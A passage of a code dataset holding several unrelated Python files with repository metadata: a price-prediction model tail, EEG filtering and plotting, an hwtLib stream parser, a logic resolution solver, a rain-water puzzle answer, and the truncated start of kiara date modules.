y_pred1b = fit_predict(xsb, y_train)\n y_pred2b = fit_predict(xsb, y_train)\n\n y_pred = np.mean(np.array([y_pred1, y_pred2, y_pred1b, y_pred2b]), axis=0)\n y_pred = np.expm1(y_scaler.inverse_transform(y_pred.reshape(-1, 1))[:, 0])\n print('Avg Valid RMSLE: {:.4f}'.format(np.sqrt(mean_squared_log_error(valid['price'], y_pred))))\n\n valid = valid.reset_index(drop=True)\n result = pd.concat([valid, pd.DataFrame(y_pred, columns=['pred'])], axis=1)\n result.to_csv(os.path.join(BASE_DIR, 'out/result_avg.csv'))\n\n y_pred1 = np.expm1(y_scaler.inverse_transform(y_pred1.reshape(-1, 1))[:, 0])\n print('Avg Valid RMSLE1: {:.4f}'.format(np.sqrt(mean_squared_log_error(valid['price'], y_pred1))))\n result1 = pd.concat([valid, pd.DataFrame(y_pred1, columns=['pred'])], axis=1)\n result.to_csv(os.path.join(BASE_DIR, 'outresult_1.csv'))\n\n y_pred1b = np.expm1(y_scaler.inverse_transform(y_pred1b.reshape(-1, 1))[:, 0])\n print('Avg Valid RMSLE1: {:.4f}'.format(np.sqrt(mean_squared_log_error(valid['price'], y_pred1b))))\n result1 = pd.concat([valid, pd.DataFrame(y_pred1b, columns=['pred'])], axis=1)\n result.to_csv(os.path.join(BASE_DIR, 'out/result_1b.csv'))\n\n xs_train=[X_train, X_train]\n ytrain_pred1 = fit_predict(xs_train, y_train)\n ytrain_pred1 = np.expm1(y_scaler.inverse_transform(ytrain_pred1.reshape(-1, 1))[:, 0])\n print('Avg Valid RMSLE1: {:.4f}'.format(np.sqrt(mean_squared_log_error(train['price'], ytrain_pred1))))\n result_train1 = pd.concat([train, pd.DataFrame(ytrain_pred1, columns=['pred'])], axis=1)\n result.to_csv(os.path.join(BASE_DIR, 'out/result_trian1.csv'))\n\n#############################\n","repo_name":"glbreeze/mercari-price-suggestion","sub_path":"TFIDF_model.py","file_name":"TFIDF_model.py","file_ext":"py","file_size_in_byte":6452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27749893145","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n@author: Nikolas Kyriacou\r\nMSc Project on the Investigation of the SNR in EEG Signals\r\n\"\"\"\r\nfrom IIR2Filter import IIR2Filter # This library is obtained from https://github.com/poganyg/IIR-filter/blob/master/src/IIR2Filter.py\r\nimport numpy as np\r\nimport scipy.signal as signal\r\nimport matplotlib.pyplot as plt\r\n#import scipy.io.wavfile as wavfile\r\nimport math as math\r\nfrom scipy.interpolate import interp1d\r\nimport scipy.stats as stats\r\n\r\n\r\nfsampl = 1000 # Sampling frequency\r\nt_step =4000 # time step or segment size in ms \r\nt_start = 4000 # start time of segment in ms\r\nA_gain = 50 # Gain of the EEG Amplifier\r\nmVolts=1000 #1V = 1000mV\r\nmicroV=1000000 #1V = 1000000uV\r\n\r\n\"\"\"\r\nSpecify EEG file name\r\n\"\"\"\r\ndata_in=np.loadtxt('Experiments/Task7.csv')\r\ndata=data_in*microV/A_gain #*mVolts/A_gain\r\ns_size=len(data) # number of signal samples\r\n\r\n\"\"\"\r\nPlot the unfiltered EEG signal and its spectrum\r\n\"\"\"\r\nks = np.arange(s_size)*1000/fsampl #Array for signal x-axis \r\nplt.figure(1)\r\nplt.title('Raw EEG Signal')\r\nplt.xlabel('Time (ms)')\r\nplt.ylabel('Amplitude (μV)')\r\nplt.grid(which='both', axis='both')\r\nplt.plot(ks,data)\r\nplt.show()\r\n\r\n\"\"\"\r\nPlot the spectrum of the unfiltered EEG signal and its spectrum\r\n\"\"\"\r\n\r\nmask2=np.fft.fft(data)\r\nplt.figure(2)\r\nplt.title('Raw EEG Signal Spectrum')\r\nplt.xlabel('Frequency (Hz)')\r\nplt.ylabel('Signal Power')\r\nplt.grid(which='both', axis='both')\r\nkf = np.arange(s_size)*fsampl/s_size #Array for spectrum x-axis \r\nplt.plot(kf,abs(mask2)/s_size) \r\nplt.show() \r\n\r\n'''\r\nFilter the signal with a 50Hz notch filter\r\n'''\r\nf_signal = np.zeros(s_size) #Initialize array to store the filtered samples\r\nFilterMains = IIR2Filter(10,[45,55],'bandstop',design='cheby1',rp=2,fs = fsampl) \r\nfor i in range(len(data)):\r\n f_signal[i] = FilterMains.filter(data[i])\r\n\r\n\"\"\"\r\nPlot the 50Hz filtered EEG signal and its spectrum\r\n\"\"\"\r\nplt.figure(3)\r\nplt.title('50Hz Filtered EEG Signal')\r\nplt.xlabel('Time (ms)')\r\nplt.ylabel('Amplitude (μV)')\r\nplt.grid(which='both', axis='both')\r\nplt.plot(ks,f_signal)\r\nplt.show() \r\nmask2=np.fft.fft(f_signal)\r\nplt.figure(4)\r\nplt.title('50Hz Filtered EEG Signal Spectrum')\r\nplt.xlabel('Frequency (Hz)')\r\nplt.ylabel('Signal Power')\r\nplt.grid(which='both', axis='both')\r\nkf = np.arange(s_size)*fsampl/s_size\r\nplt.plot(kf,abs(mask2)/s_size) \r\nplt.show() \r\n\"\"\"\r\nPlot part of the filtered EEG signal and its spectrum\r\n\"\"\"\r\npsize = int(t_step*fsampl/1000) #/fsampl # size of partial buffer\r\npstart = int(t_start*fsampl/1000) #/fsampl # begining of partial buffer\r\nkp = np.arange(t_start,t_start+t_step,1000/fsampl) #pstart\r\nseg=np.zeros(psize)\r\nseg[0:psize]=f_signal[pstart:psize+pstart]\r\nplt.figure(5)\r\nplt.title('50Hz Filtered Partial EEG Signal (from ' + str(t_start)+'ms to '+str(t_start+t_step) +'ms)')\r\nplt.xlabel('Time (ms)')\r\nplt.ylabel('Amplitude (μV)')\r\nplt.grid(which='both', axis='both')\r\nplt.plot(kp,seg)\r\nplt.show() \r\n\r\nkfp = np.arange(0,fsampl,fsampl/psize)\r\nmask2=np.fft.fft(seg)\r\nplt.figure(6)\r\nplt.title('50Hz Filtered Partial EEG Signal Spectrum (from ' + str(t_start)+'ms to '+str(t_start+t_step) +'ms)')\r\nplt.xlabel('Frequency (Hz)')\r\nplt.ylabel('Signal Power')\r\nplt.grid(which='both', axis='both')\r\nmask2[0:int(5*psize/fsampl)]=0 #Set 0Hz and 1Hz to 0\r\nplot_fmax=40 #maximum plot frequency\r\n#ppsize=psize-300\r\nplt.plot(kfp[0:int(plot_fmax*psize/fsampl)],abs((mask2[0:int(plot_fmax*psize/fsampl)]/psize))) #display up to 40Hz\r\nplt.show()\r\n\r\n\"\"\"\r\nBandpass filter the EEG signal 8Hz to 12Hz\r\n\"\"\"\r\nf_signalbp = np.zeros(s_size) #Initialize array to store the filtered samples\r\n#FilterAlpha = IIR2Filter(10,[7,13],'bandpass',design='cheby1',rp=2,fs = fsampl) \r\nFilterAlpha = IIR2Filter(10,[8,12],'bandpass',design='butter',rp=2,fs = fsampl) \r\nfor i in range(len(data)):\r\n f_signalbp[i] = FilterAlpha.filter(f_signal[i])\r\n\r\n\r\n\"\"\"\r\nPlot the Bandpass filtered EEG signal and its spectrum\r\n\"\"\"\r\nplt.figure(7)\r\nplt.title('Bandpass Filtered EEG Signal')\r\nplt.xlabel('Time (ms)')\r\nplt.ylabel('Amplitude (μV)')\r\nplt.grid(which='both', axis='both')\r\nplt.plot(ks,f_signalbp)\r\nplt.show() \r\nmask2=np.fft.fft(f_signalbp)\r\nplt.figure(8)\r\nplt.title('Bandpass Filtered EEG Signal Spectrum')\r\nplt.xlabel('Frequency (Hz)')\r\nplt.ylabel('Signal Power')\r\nplt.grid(which='both', axis='both')\r\nkf = np.arange(s_size)*fsampl/s_size\r\nplt.plot(kf,abs(mask2)) \r\nplt.show() \r\n\r\n\"\"\"\r\nPlot a segment of the bandpass filtered EEG signal and its spectrum\r\nTo set the plot range change t_step and t_start at the beggining of the program\r\n\"\"\"\r\n\r\npsize = int(t_step*fsampl/1000) #/fsampl # size of partial buffer\r\npstart = int(t_start*fsampl/1000) #/fsampl # begining of partial buffer\r\nkp = np.arange(t_start,t_start+t_step,1000/fsampl) #pstart\r\nbpseg=np.zeros(psize)\r\nbpseg[0:psize]=f_signalbp[pstart:psize+pstart]\r\nplt.figure(9)\r\nplt.title('Bandpass Filtered Partial EEG Signal (from ' + str(t_start)+'ms to '+str(t_start+t_step) +'ms)')\r\nplt.xlabel('Time (ms)')\r\nplt.ylabel('Amplitude (μV)')\r\nplt.grid(which='both', axis='both')\r\nplt.plot(kp,bpseg)\r\nplt.show() \r\n\r\nkfp = np.arange(0,fsampl,fsampl/psize)\r\nmask3=np.fft.fft(bpseg)\r\nplt.figure(10)\r\nplt.title('Bandpass Filtered Partial EEG Signal Spectrum (from ' + str(t_start)+'ms to '+str(t_start+t_step) +'ms)')\r\nplt.xlabel('Frequency (Hz)')\r\nplt.ylabel('Signal Power')\r\nplt.grid(which='both', axis='both')\r\nmask3[0:int(5*psize/fsampl)]=0 #Set 0Hz and 1Hz to 0\r\nplot_fmax=40 #maximum plot frequency\r\nplt.plot(kfp[0:int(plot_fmax*psize/fsampl)],abs((mask3[0:int(plot_fmax*psize/fsampl)]/psize))) #display up to 40Hz\r\nplt.show()\r\n\r\n\r\n","repo_name":"nikolaskyr/EEG-Signals-SNR-Calculation","sub_path":"EEG_Plots.py","file_name":"EEG_Plots.py","file_ext":"py","file_size_in_byte":5600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17409132335","text":"from typing import Union, Optional, Tuple, List\n\nfrom hwt.code import If, Switch, Concat\nfrom hwt.hdl.frameTmplUtils import ChoicesOfFrameParts\nfrom hwt.hdl.transPart import TransPart\nfrom hwt.hdl.types.defs import BIT\nfrom hwt.hdl.types.stream import HStream\nfrom hwt.hdl.types.struct import HStructField\nfrom hwt.interfaces.structIntf import StructIntf\nfrom hwt.interfaces.unionIntf import UnionSource, UnionSink\nfrom hwt.synthesizer.byteOrder import reverseByteOrder\nfrom hwt.synthesizer.rtlLevel.rtlSignal import RtlSignal\nfrom hwt.synthesizer.unit import Unit\nfrom hwtLib.amba.axis import AxiStream\nfrom hwtLib.amba.axis_comp.frame_parser.out_containers import ListOfOutNodeInfos, \\\n ExclusieveListOfHsNodes, InNodeInfo, InNodeReadOnlyInfo, OutStreamNodeGroup, \\\n OutStreamNodeInfo, OutNodeInfo\nfrom hwtLib.handshaked.builder import HsBuilder\nfrom pyMathBitPrecise.bit_utils import mask\n\n\ndef get_byte_order_modifier(axis: AxiStream):\n if axis.IS_BIGENDIAN:\n return reverseByteOrder\n else:\n\n def byteOrderCare(sig):\n return sig\n\n return byteOrderCare\n\n\nclass AxiS_frameParserFieldConnector():\n\n def __init__(self, parent: Unit, dataIn: AxiStream, dataOut: Union[StructIntf, UnionSource]):\n self.parent = parent\n self.dataIn = dataIn\n self.dataOut = dataOut\n self.byteOrderCare = get_byte_order_modifier(dataIn)\n self._tmpRegsForSelect = {}\n # TransTmpl: List[RtlSignal]\n self._signalsOfParts = {}\n # AxiStream: OutStreamNodeInfo\n self._streamNodes = {}\n\n def getInDataSignal(self, transPart: TransPart):\n busDataSignal = self.dataIn.data\n high, low = transPart.getBusWordBitRange()\n return busDataSignal[high:low]\n\n def choiceIsSelected(self,\n interfaceOfChoice: Union[UnionSource, UnionSink]):\n \"\"\"\n Check if union member is selected by _select interface\n in union interface\n \"\"\"\n parent = interfaceOfChoice._parent\n r = self._tmpRegsForSelect[parent]\n i = parent._interfaces.index(interfaceOfChoice)\n return i, r.data._eq(i), r.vld\n\n def connectParts(self,\n allOutNodes: ListOfOutNodeInfos,\n words: Tuple[int, List[Union[TransPart, ChoicesOfFrameParts]], bool],\n wordIndex: Optional[RtlSignal]):\n \"\"\"\n Create main datamux from dataIn to dataOut\n \"\"\"\n for currentWordIndex, transParts, _ in words:\n # each word index is used and there may be TransParts which are\n # representation of padding\n outNondes = ListOfOutNodeInfos()\n for part in transParts:\n self.connectPart(outNondes, part, BIT.from_py(1), BIT.from_py(1),\n wordIndex, currentWordIndex)\n\n allOutNodes.addWord(currentWordIndex, outNondes)\n\n def connectChoicesOfFrameParts(\n self,\n hsNondes: ListOfOutNodeInfos,\n part: ChoicesOfFrameParts,\n en: Union[RtlSignal, bool],\n exclusiveEn: Optional[RtlSignal],\n wordIndex: Optional[RtlSignal],\n currentWordIndex: int):\n tToIntf = self.dataOut._fieldsToInterfaces\n parentIntf = tToIntf[part.origin.parent.getFieldPath()]\n try:\n sel = self._tmpRegsForSelect[parentIntf]\n except KeyError:\n sel = HsBuilder(self.parent, parentIntf._select).buff().end\n self._tmpRegsForSelect[parentIntf] = sel\n unionGroup = ExclusieveListOfHsNodes(sel)\n\n # for unions\n for choice in part:\n # connect data signals of choices and collect info about\n # streams\n intfOfChoice = tToIntf[choice.tmpl.getFieldPath()]\n selIndex, isSelected, isSelectValid = self.choiceIsSelected(\n intfOfChoice)\n _exclusiveEn = isSelectValid & isSelected & exclusiveEn\n\n unionMemberPart = ListOfOutNodeInfos()\n for p in choice:\n self.connectPart(unionMemberPart, p, en, _exclusiveEn,\n wordIndex, currentWordIndex)\n unionGroup.append(selIndex, unionMemberPart)\n hsNondes.append(unionGroup)\n\n if wordIndex is not None:\n en = en & wordIndex._eq(currentWordIndex)\n if part.isLastPart():\n # synchronization of reading from _select register for unions\n selNode = InNodeInfo(sel, en)\n else:\n selNode = InNodeReadOnlyInfo(sel, en)\n hsNondes.append(selNode)\n\n def connectStreamOfFrameParts(\n self,\n hsNondes: ListOfOutNodeInfos,\n part: Union[TransPart, ChoicesOfFrameParts],\n en: Union[RtlSignal, bool],\n exclusiveEn: Optional[RtlSignal],\n wordIndex: Optional[RtlSignal],\n currentWordIndex: int):\n orig = part.tmpl.origin[-1]\n # use tmpl.parent because part is actually a chunk of data\n # in the stream\n path_to_stream_port = part.tmpl.parent.getFieldPath()\n dout = self.dataOut._fieldsToInterfaces[path_to_stream_port]\n if isinstance(orig, HStructField):\n orig = orig.dtype\n assert isinstance(orig, HStream), orig\n\n # if not part.isLastPart():\n # raise NotImplementedError()\n\n if not len(orig.start_offsets) == 1:\n raise NotImplementedError()\n\n din = self.dataIn\n is_first_part_in_stream = part.tmpl.parent.bitAddr == part.startOfPart\n if is_first_part_in_stream:\n frame_range = part.tmpl.parent.bitAddr, part.tmpl.parent.bitAddrEnd\n DW = din.DATA_WIDTH\n start_offset = frame_range[0] % DW\n end_rem = frame_range[1] % DW\n if orig.start_offsets != (0,):\n raise NotImplementedError()\n\n # this is a first part of stream\n # now connect all data for each part\n non_data_signals = [din.valid, din.ready, din.last]\n if start_offset == 0 and end_rem == 0:\n pass\n else:\n if dout.USE_STRB:\n non_data_signals.append(din.strb)\n if dout.USE_KEEP:\n non_data_signals.append(din.keep)\n\n assert start_offset % 8 == 0, start_offset\n assert end_rem % 8 == 0, end_rem\n first_word_i = frame_range[0] // DW\n last_word_i = (frame_range[1] - 1) // DW\n first_word_mask = mask((DW - start_offset) // 8) << start_offset // 8\n body_word_mask = mask(DW // 8)\n\n def set_mask(m):\n res = []\n if dout.USE_STRB:\n res.append(dout.strb(m))\n if dout.USE_KEEP:\n res.append(dout.keep(m))\n return res\n\n if end_rem == 0:\n last_word_mask = body_word_mask\n else:\n last_word_mask = mask(end_rem // 8)\n if first_word_i == last_word_i:\n # only single word, mask is constant\n m = first_word_mask & last_word_mask\n set_mask(m)\n elif first_word_i == last_word_i + 1:\n # only two words, mask is differnt between word 0 and 1\n raise NotImplementedError()\n else:\n # 2+ words, first and body or last and body may be same\n if first_word_mask == body_word_mask:\n # last is only word with a special mask\n If(wordIndex._eq(last_word_i),\n *set_mask(last_word_mask)\n ).Else(\n *set_mask(body_word_mask)\n )\n elif last_word_mask == body_word_mask:\n # first is only word with special mask\n If(wordIndex._eq(first_word_i),\n *set_mask(first_word_mask)\n ).Else(\n *set_mask(body_word_mask)\n )\n else:\n # first, last, body word have all unique masks\n Switch(wordIndex)\\\n .Case(first_word_i, set_mask(first_word_mask))\\\n .Case(last_word_i, set_mask(last_word_mask))\\\n .Default(set_mask(body_word_mask))\n\n dout(din, exclude=non_data_signals)\n is_last_part_in_stream = part.tmpl.parent.bitAddrEnd == part.endOfPart\n if is_last_part_in_stream:\n if wordIndex is None:\n last = 1\n else:\n last = wordIndex._eq(currentWordIndex)\n dout.last(last)\n\n if is_first_part_in_stream or part.startOfPart % din.DATA_WIDTH == 0:\n # first part in current word\n streamGroup = self._streamNodes.setdefault(dout, OutStreamNodeGroup(wordIndex, currentWordIndex))\n streamGroup.word_range_max = currentWordIndex\n on = OutStreamNodeInfo(self.parent, dout, en, exclusiveEn, streamGroup)\n hsNondes.append(on)\n\n def connectPart(self,\n hsNondes: ListOfOutNodeInfos,\n part: Union[TransPart, ChoicesOfFrameParts],\n en: Union[RtlSignal, bool],\n exclusiveEn: Union[RtlSignal, bool],\n wordIndex: Optional[RtlSignal],\n currentWordIndex: int):\n \"\"\"\n Create datamux for a single output word in main fsm\n and colect metainformations for handshake logic\n and strb/keep\n\n :param hsNondes: list of nodes of handshaked logic\n \"\"\"\n if isinstance(part, ChoicesOfFrameParts):\n # connect union field\n return self.connectChoicesOfFrameParts(\n hsNondes, part, en, exclusiveEn, wordIndex, currentWordIndex)\n # elif isinstance(part, StreamOfFrameParts):\n # return self.connectStreamOfFrameParts(\n # hsNondes, part, en, exclusiveEn, wordIndex)\n elif part.isPadding:\n return\n\n fieldInfo = part.tmpl.origin[-1]\n if isinstance(fieldInfo, HStream) or (\n isinstance(fieldInfo, HStructField) and\n isinstance(fieldInfo.dtype, HStream)):\n return self.connectStreamOfFrameParts(\n hsNondes, part, en, exclusiveEn, wordIndex, currentWordIndex)\n\n # connect regular scalar field\n fPartSig = self.getInDataSignal(part)\n assert isinstance(fieldInfo, HStructField), fieldInfo\n\n try:\n signalsOfParts = self._signalsOfParts[part.tmpl]\n except KeyError:\n signalsOfParts = []\n self._signalsOfParts[part.tmpl] = signalsOfParts\n\n if wordIndex is not None:\n en = en & wordIndex._eq(currentWordIndex)\n\n if part.isLastPart():\n # connect all parts in this group to output stream\n signalsOfParts.append(fPartSig)\n tToIntf = self.dataOut._fieldsToInterfaces\n intf = tToIntf[part.tmpl.getFieldPath()]\n intf.data(self.byteOrderCare(\n Concat(\n *reversed(signalsOfParts)\n ))\n )\n on = OutNodeInfo(self.parent, intf, en, exclusiveEn)\n hsNondes.append(on)\n else:\n # part is not in same word as last part, we have to store it's value\n # to register until the last part arrive\n fPartReg = self.parent._reg(f\"{fieldInfo.name:s}_part_{len(signalsOfParts):d}\",\n fPartSig._dtype)\n dataVld = self.dataIn.valid & en & exclusiveEn\n If(dataVld,\n fPartReg(fPartSig)\n )\n signalsOfParts.append(fPartReg)\n","repo_name":"Nic30/hwtLib","sub_path":"hwtLib/amba/axis_comp/frame_parser/field_connector.py","file_name":"field_connector.py","file_ext":"py","file_size_in_byte":12034,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"48"} +{"seq_id":"5420725074","text":"import copy\nimport time\n\nnumOfQuery = 0\nnumOfSentences = 0\nqueries = []\nstartTime = 0\n\n\nclass KB:\n def __init__(self):\n self.predicates = set()\n self.neg = {}\n self.pos = {}\n self.checked = {}\n self.sentences = []\n\n def add(self, predicate, index):\n if '~' not in predicate[0]:\n if predicate[0] not in self.predicates:\n self.predicates.add(predicate[0])\n self.pos[predicate[0]] = []\n self.pos[predicate[0]].append(index)\n else:\n if predicate[0] not in self.predicates:\n self.predicates.add(predicate[0])\n self.neg[predicate[0]] = []\n self.neg[predicate[0]].append(index)\n\n def addSentences(self, sentence):\n self.sentences.append(sentence)\n\n\ndef negative(sentence):\n if sentence[0] == '~':\n sentence = sentence[1:]\n else:\n sentence = '~' + sentence\n return sentence\n\n\ndef getPredicate(sentence):\n predicate = []\n action = sentence.split('(')\n if ',' in action[1]:\n variables = action[1].split(')')[0].split(',')\n predicate.append(action[0])\n predicate.extend(variables)\n else:\n variables = action[1].split(')')[0]\n predicate.append(action[0])\n predicate.append(variables)\n\n return predicate\n\n\ndef isVariable(variable):\n if variable.islower():\n return True\n\n\ndef standard(predicate, index):\n for i in range(1, len(predicate)):\n if isVariable(predicate[i]):\n predicate[i] = predicate[i] + str(index)\n return predicate[0] + '(' + ','.join(predicate[1:]) + ')'\n\n\ndef transfer(sentence, index, knowledgeBase):\n if '=>' in sentence:\n require, conclusion = sentence.split('=>')\n # remove the space\n require = require.strip()\n conclusion = conclusion.strip()\n if '&' in require:\n soloParts = require.split('&')\n for i in range(0, len(soloParts)):\n soloParts[i] = soloParts[i].strip()\n soloParts[i] = negative(soloParts[i])\n predicate = getPredicate(soloParts[i])\n knowledgeBase.add(predicate, index)\n soloParts[i] = standard(predicate, index)\n result = ' | '.join(soloParts)\n else:\n require = negative(require)\n predicate = getPredicate(require)\n knowledgeBase.add(predicate, index)\n result = standard(predicate, index)\n predicate = getPredicate(conclusion)\n knowledgeBase.add(predicate, index)\n conclusion = standard(predicate, index)\n result = result + ' | ' + conclusion\n knowledgeBase.addSentences(result)\n else:\n predicate = getPredicate(sentence)\n knowledgeBase.add(predicate, index)\n sentence = standard(predicate, index)\n knowledgeBase.addSentences(sentence)\n\n\ndef firstResolve(predicates, KB):\n actionNeg = negative(predicates[0])\n if '~' in predicates[0] and actionNeg in KB.pos:\n return KB.pos[actionNeg]\n elif '~' not in predicates[0] and actionNeg in KB.neg:\n return KB.neg[actionNeg]\n\n\ndef unify(KBpre, Querypre):\n matchDict = {}\n KBpredicates = getPredicate(KBpre)\n Querypredicates = getPredicate(Querypre)\n numVKB = len(KBpredicates)\n numVQ = len(Querypredicates)\n if numVKB != numVQ:\n return matchDict\n for i in range(1, numVKB):\n if isVariable(KBpredicates[i]) and isVariable(Querypredicates[i]):\n if (KBpredicates[i] not in matchDict) and (Querypredicates[i] not in matchDict):\n matchDict[KBpredicates[i]] = Querypredicates[i]\n elif isVariable(KBpredicates[i]) and not isVariable(Querypredicates[i]):\n if KBpredicates[i] not in matchDict:\n matchDict[KBpredicates[i]] = Querypredicates[i]\n elif matchDict[KBpredicates[i]] != Querypredicates[i]:\n return {}\n elif (not isVariable(KBpredicates[i])) and isVariable(Querypredicates[i]):\n if Querypredicates[i] not in matchDict:\n matchDict[Querypredicates[i]] = KBpredicates[i]\n elif matchDict[Querypredicates[i]] != KBpredicates[i]:\n return {}\n else:\n if KBpredicates[i] == Querypredicates[i]:\n matchDict[KBpredicates[i]] = Querypredicates[i]\n else:\n return {}\n return matchDict\n\n\ndef getSentence(predicate, possibleValue, dictionary):\n newSentence = ''\n predicate.pop(possibleValue)\n for i in range(0, len(predicate)):\n pre = getPredicate(predicate[i])\n for j in range(1, len(pre)):\n if pre[j] in dictionary:\n pre[j] = dictionary[pre[j]]\n newSentence = newSentence + pre[0] + '(' + ','.join(pre[1:]) + ')' + ' | '\n return newSentence\n\n\ndef resolution(knowledgeBase, query, depth):\n if depth >= 150 or time.time() - startTime > 10:\n return False\n # if depth > 120:\n # return False\n actionIndex = {}\n queryPart = query.split('|')\n for i in range(0, len(queryPart)):\n queryPart[i] = queryPart[i].strip()\n predicate = getPredicate(queryPart[i])\n tempValue = firstResolve(predicate, knowledgeBase)\n if tempValue:\n actionIndex[predicate[0]] = tempValue\n if actionIndex:\n for action in actionIndex.keys():\n for index in actionIndex[action]:\n findFlag = False\n KBSentence = knowledgeBase.sentences[index]\n negAction = negative(action)\n preKBSentence = KBSentence.split('|')\n preQuery = query.split('|')\n KBpossible = []\n Querypossible = []\n # remove the space\n for i in range(0, len(preKBSentence)):\n preKBSentence[i] = preKBSentence[i].strip()\n predicateKB = getPredicate(preKBSentence[i])\n if predicateKB[0] == negAction:\n KBpossible.append(i)\n for i in range(0, len(preQuery)):\n preQuery[i] = preQuery[i].strip()\n predicateQuery = getPredicate(preQuery[i])\n if predicateQuery[0] == action:\n Querypossible.append(i)\n for i in range(0, len(KBpossible)):\n for j in range(0, len(Querypossible)):\n matchDict = unify(preKBSentence[KBpossible[i]], preQuery[Querypossible[j]])\n if matchDict:\n KBindex = i\n Qindex = j\n findFlag = True\n break\n if not findFlag:\n resSentence = \"NotFind\"\n else:\n tempSentence = getSentence(preKBSentence, KBpossible[KBindex], matchDict)\n tempSentence += getSentence(preQuery, Querypossible[Qindex], matchDict)\n if tempSentence == '':\n return True\n else:\n res = []\n tempSentence = tempSentence[:-3]\n resPredicate = tempSentence.split('|')\n for i in range(0, len(resPredicate)):\n resPredicate[i] = resPredicate[i].strip()\n resPredicate = set(resPredicate)\n for element in resPredicate:\n if negative(element) not in resPredicate:\n res.append(element)\n\n if not res:\n resSentence = \"NotFind\"\n else:\n resSentence = ' | '.join(sorted(res))\n print(resSentence)\n if resSentence in knowledgeBase.checked and knowledgeBase.checked[resSentence] >= 20:\n continue\n if resSentence == \"NotFind\":\n continue\n result = resolution(knowledgeBase, resSentence, depth + 1)\n if result:\n return True\n if resSentence not in knowledgeBase.checked:\n knowledgeBase.checked[resSentence] = 0\n knowledgeBase.checked[resSentence] += 1\n return False\n\n\nif __name__ == \"__main__\":\n knowledgeBase = KB()\n inputFile = open(\"input.txt\")\n fileData = inputFile.readlines()\n numOfQuery = int(fileData.pop(0).rstrip())\n for i in range(0, numOfQuery):\n queries.append(fileData.pop(0).rstrip())\n numOfSentences = int(fileData.pop(0).rstrip())\n for i in range(0, numOfSentences):\n sentence = fileData.pop(0).rstrip()\n transfer(sentence, i, knowledgeBase)\n # print(knowledgeBase.sentences)\n\n output = open(\"output.txt\", \"w\")\n for i in range(0, numOfQuery):\n copyKB = copy.deepcopy(knowledgeBase)\n queries[i] = negative(queries[i])\n copyKB.addSentences(queries[i])\n predicate = getPredicate(queries[i])\n copyKB.add(predicate, len(copyKB.sentences) - 1)\n startTime = time.time()\n result = resolution(copyKB, queries[i], 0)\n if result:\n print(result)\n if i != numOfQuery - 1:\n output.write(\"TRUE\\n\")\n else:\n output.write('TRUE')\n else:\n if i != numOfQuery - 1:\n output.write(\"FALSE\\n\")\n else:\n output.write('FALSE')\n","repo_name":"Lisha-Xu/CSCI561-AI","sub_path":"HW3/homework.py","file_name":"homework.py","file_ext":"py","file_size_in_byte":9578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10721959121","text":"def answer(heights):\n N = len(heights)\n # Scan for left highest\n lhigh = -1\n lindex = -1\n larray = [0] * N\n for i in range(N):\n vi = heights[i]\n if vi < lhigh:\n larray[i] = lindex\n else:\n larray[i] = i\n lhigh = vi\n lindex = i\n # scan for right highest\n rhigh = -1\n rindex = -1\n rarray = [0] * N\n for i in range(N-1, -1, -1):\n vi = heights[i]\n if vi < rhigh:\n rarray[i] = rindex\n else:\n rarray[i] = i\n rhigh = vi\n rindex = i\n\n # print (larray)\n # print ([heights[i] for i in larray])\n # print (rarray)\n # print ([heights[i] for i in rarray])\n\n # build total height\n total = 0\n for i in range(N):\n lindex = larray[i]\n rindex = rarray[i]\n if i - lindex > 0 and rindex - i > 0:\n v = min(heights[lindex], heights[rindex]) - heights[i]\n total += v\n # print (\"Height of cell {} is {}\".format(i, v))\n # print(\"Total is {}\".format(total))\n return total\n\n\nheights = [1, 4, 2, 5, 1, 2, 3]\nheights = [1, 2, 3, 2, 1]\nanswer(heights)\n[0, 1, 1, 3, 3, 3, 3]\n[3, 3, 3, 3, 6, 6, 6]\n","repo_name":"iveney/google-foobar","sub_path":"when_it_rains_it_pours.py","file_name":"when_it_rains_it_pours.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6809090499","text":"# -*- coding: utf-8 -*-\n\n\"\"\"A collection of date related modules.\n\nMost of those are very bare-bones, not really dealing with more advanced (but very important) concepts like timezones\nand resolution yet.\n\"\"\"\nimport datetime\nimport re\nimport typing\n\nfrom kiara import KiaraModule\nfrom kiara.data import ValueSet\nfrom kiara.data.values import ValueSchema\n\n# flake8: noqa\n\n\nclass ExtractDateModule(KiaraModule):\n \"\"\"Extract a date object from a string.\n\n This module is not really smart yet, currently it uses the following regex to extract a date (which might fail in a lot of cases):\n\n r\"_(\\d{4}-\\d{2}-\\d{2})_\"\n\n \"\"\"\n\n _module_type_name = \"extract_from_string\"\n\n def create_input_schema(\n self,\n ) -> typing.Mapping[\n str, typing.Union[ValueSchema, typing.Mapping[str, typing.Any]]\n ]:\n\n return {\"text\": {\"type\": \"string\", \"doc\": \"The input string.\"}}\n\n def create_output_schema(\n self,\n ) -> typing.Mapping[\n str, typing.Union[ValueSchema, typing.Mapping[str, typing.Any]]\n ]:\n return {\n \"date\": {\"type\": \"date\", \"doc\": \"The date extracted from the input string.\"}\n }\n\n def process(self, inputs: ValueSet, outputs: ValueSet) -> None:\n\n from dateutil import parser\n\n text = inputs.get_value_data(\"text\")\n date_match = re.findall(r\"_(\\d{4}-\\d{2}-\\d{2})_\", text)\n assert date_match\n d_obj = parser.parse(date_match[0]) # type: ignore\n\n outputs.set_value(\"date\", d_obj)\n\n\nclass DateRangeCheckModule(KiaraModule):\n \"\"\"Check whether a date falls within a specified date range.\n\n If none one of the inputs 'earliest' or 'latest' is set, this module will always return 'True'.\n\n Return ``True`` if that's the case, otherwise ``False``.\n \"\"\"\n\n _module_type_name = \"range_check\"\n\n def create_input_schema(\n self,\n ) -> typing.Mapping[\n str, typing.Union[ValueSchema, typing.Mapping[str, typing.Any]]\n ]:\n inputs: typing.Dict[str, typing.Dict[str, typing.Any]] = {\n \"date\": {\"type\": \"date\", \"doc\": \"The date to check.\"},\n \"earliest\": {\n \"type\": \"date\",\n \"doc\": \"The earliest date that is allowed.\",\n \"optional\": True,\n },\n \"latest\": {\n \"type\": \"date\",\n \"doc\": \"The latest date that is allowed.\",\n \"optional\": 